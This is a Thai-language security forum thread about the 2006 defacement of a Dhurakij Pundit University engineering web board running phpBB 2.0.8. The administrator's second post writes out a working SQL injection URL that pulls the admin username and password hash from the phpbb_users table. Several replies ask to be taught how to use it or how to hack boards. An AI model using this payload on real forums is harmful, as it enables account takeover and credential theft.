Page 1 of 4 123 ... LastLast
Results 1 to 10 of 32

Thread: webboard มหาลัย มหาวิทยาลัยธุรกิจบัณฑิตย์ โดน HACK !!!

  1. #1
    Administrator asylu3's Avatar
    Join Date
    Jun 2000
    Location
    Thailand
    Posts
    3,557


    webboard มหาลัย ศรีประทุม โดน HACK !!!

    เว็บไซต์ที่โดนคือ http://forum.eng.dpu.ac.th/
    วันที่พบคือ 25 July 2006 18.00
    บังเอิญเข้าไปเห็นมา ไม่ทำนะครับ คาดว่าจะโดนจากชองโหว่ของ Forum แต่ตอนนี้ยังไม่รู้ว่า Forum ตัวไหน หรือไม่ก็โดนจาก Service IIS ส่งที่เห็นก็คือรูปต่อไปนี้

    [attachmentid=23]

    ปล. ขออภัยนะครับแก้ไขใหม่เป็นของ มหาวิทยาลัยธุรกิจบัณฑิตย์ นะครับไม่ใช่ศรีประทุม
    Attached Images Attached Images

  2. #2
    Administrator asylu3's Avatar
    Join Date
    Jun 2000
    Location
    Thailand
    Posts
    3,557


    Re: webboard มหาลัย ศรีประทุม โดน HACK !!!

    เป็นเว็บบอร์ดจริงๆด้วย Powered by phpBB 2.0.8
    http://web.archive.org/web/20050306075734/....eng.dpu.ac.th/

    ช่องโหว่ของ Version นี้คือ

    Code:
    /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION
    
    SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password
    
    FROM phpbb_users WHERE user_id=2 LIMIT 1/*
    เท่าที่ดูจาก Code แล้วคือ MySQL Injection สงสัย user Admin จะโดน Hack แน่เลย แล้วถ้าโชคร้ายกว่านั้นถ้าใช้รหัส Admin เดียวกันกับ user ของ OS ก็จบ ....

  3. #3
    Junior Member
    Join Date
    Jul 2006
    Location
    United States
    Posts
    1


    Re: webboard มหาลัย ศรีประทุม โดน HACK !!!

    อยากทราบวิธีใช้โค๊ดดังกล่าวครับ

  4. #4
    Senior Member newsbot's Avatar
    Join Date
    Sep 2002
    Location
    Thailand
    Posts
    3,766


    Re: webboard มหาลัย ศรีประทุม โดน HACK !!!

    Hmm, it already explicit man !!!
    clone 'em all

  5. #5
    Junior Member
    Join Date
    Oct 2006
    Posts
    8


    ถ้าเป็นเว๊บบอร์ดที่เป็น php แต่มีการป้องกันที่ค่อนข้างแน่นหนา เราจะเจาะเข้าไปได้รึเปล่า ผมเคยลองเจาะดูแต่ไม่สามารถดึง file จาก server ได้เลย

  6. #6
    Junior Member
    Join Date
    Oct 2006
    Posts
    1


    ไม่ใช่ของ มหาลัย ศรีประทุม นิครับ

  7. #7
    Administrator asylu3's Avatar
    Join Date
    Jun 2000
    Location
    Thailand
    Posts
    3,557


    ไม่ใช่ของ มหาลัย ศรีประทุม นิครับ[/b]
    แก้ไขแล้วครับ

  8. #8
    Junior Member
    Join Date
    Nov 2006
    Location
    Hatairat road kwaeng Minburi Khet Minburi
    Posts
    15


    เสียดายเข้ามาช้าไป เลยไม่ได้เห็น จะจะ
    ตามที่เจ้าของกระทู้ ตามทีลงไว้
    เพราะวันนี้ เข้าไม่ได้แล้ว ว่าแต่นี่ก็นานแล้วทำไมทางมหาลัยไม่แก้ไขใหม่
    หรือว่าหาคนทำไม่ได้ เพราะคนเก่า เด้งไปแล้ว- - - (อานิสงค์ ถูก แฮค)

  9. #9
    Junior Member
    Join Date
    Feb 2007
    Posts
    0


    แต่ทางเว็บเค้าน่าจะป้องกันแน่นมากเลยหนิครับ สงสัยคงต้องเก่งมากๆ -*- แต่ว่าเสียดายไม่ได้เห็นด้วยตาตัวเองอ่ะครับTT อยากรู้จังว่าจะเป๋นยังไง

  10. #10
    Junior Member
    Join Date
    Feb 2007
    Posts
    18


    บอร์ดนี้คงมีคน Hack ได้เหมือนกัน ใครรู้วิธีช่วยสอนด้วยครับ

Page 1 of 4 123 ... LastLast

Similar Threads

  1. Step hack webboard phpbb !
    By Lucif€rD€vil in forum ทิปหรือเคล็ดลับการคอมพิวเตอร์ต่างๆ
    Replies: 0
    Last Post: 19-07-2008, 11:46 AM
  2. 0day: Hack Porar Webboard Admin
    By tonynuc in forum Hacking, Exploit Articles/Tutorial/Techniques
    Replies: 1
    Last Post: 26-02-2008, 03:03 PM
  3. Free webboard
    By asylu3 in forum PHP,ASP,Javascript, Html
    Replies: 0
    Last Post: 21-08-2004, 02:12 PM
  4. Hosting มหาลัย...จ้า
    By toro in forum Computer Tip & Trick / Tutorial
    Replies: 3
    Last Post: 14-05-2004, 01:21 PM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •